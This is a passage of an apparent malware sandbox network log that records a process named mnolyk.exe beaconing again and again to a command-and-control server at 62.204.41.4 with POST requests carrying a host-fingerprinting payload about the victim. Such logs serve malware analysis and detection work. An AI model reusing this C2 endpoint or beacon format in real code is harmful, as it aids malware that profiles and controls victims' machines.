                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:05.766417027 CET | 768 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            581 | 192.168.2.4 | 50276 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:05.953011036 CET | 769 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:06.018656015 CET | 769 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            582 | 192.168.2.4 | 50277 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:06.202208996 CET | 770 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:06.266885996 CET | 770 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            583 | 192.168.2.4 | 50278 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:06.451503038 CET | 771 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:06.516295910 CET | 771 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            584 | 192.168.2.4 | 50279 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:06.686450005 CET | 772 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:06.750437021 CET | 772 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            585 | 192.168.2.4 | 50280 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:06.937119961 CET | 773 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:07.001773119 CET | 773 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            586 | 192.168.2.4 | 50281 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:07.173250914 CET | 774 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:07.238677025 CET | 774 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            587 | 192.168.2.4 | 50282 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:07.406028986 CET | 775 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:07.471127033 CET | 775 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            588 | 192.168.2.4 | 50283 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:07.638780117 CET | 776 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:07.703903913 CET | 776 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            589 | 192.168.2.4 | 50284 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:07.872772932 CET | 777 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:07.935564041 CET | 777 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            59 | 192.168.2.4 | 49754 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:41.168560982 CET | 248 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:41.236617088 CET | 248 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            590 | 192.168.2.4 | 50285 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:08.115127087 CET | 778 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:08.178375959 CET | 778 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            591 | 192.168.2.4 | 50286 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:08.361526966 CET | 779 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:08.423818111 CET | 779 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            592 | 192.168.2.4 | 50287 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:08.597774982 CET | 780 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:08.659910917 CET | 780 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            593 | 192.168.2.4 | 50288 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:08.838915110 CET | 781 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:08.902780056 CET | 781 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            594 | 192.168.2.4 | 50289 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:09.090061903 CET | 782 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:09.153785944 CET | 782 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            595 | 192.168.2.4 | 50290 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:09.328460932 CET | 783 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:09.391062021 CET | 783 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            596 | 192.168.2.4 | 50291 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:09.560444117 CET | 784 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:09.623384953 CET | 784 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            597 | 192.168.2.4 | 50292 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:09.795778036 CET | 785 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:09.858160973 CET | 785 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            598 | 192.168.2.4 | 50293 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:10.028486967 CET | 786 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:10.091244936 CET | 786 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            599 | 192.168.2.4 | 50294 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:10.272901058 CET | 787 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
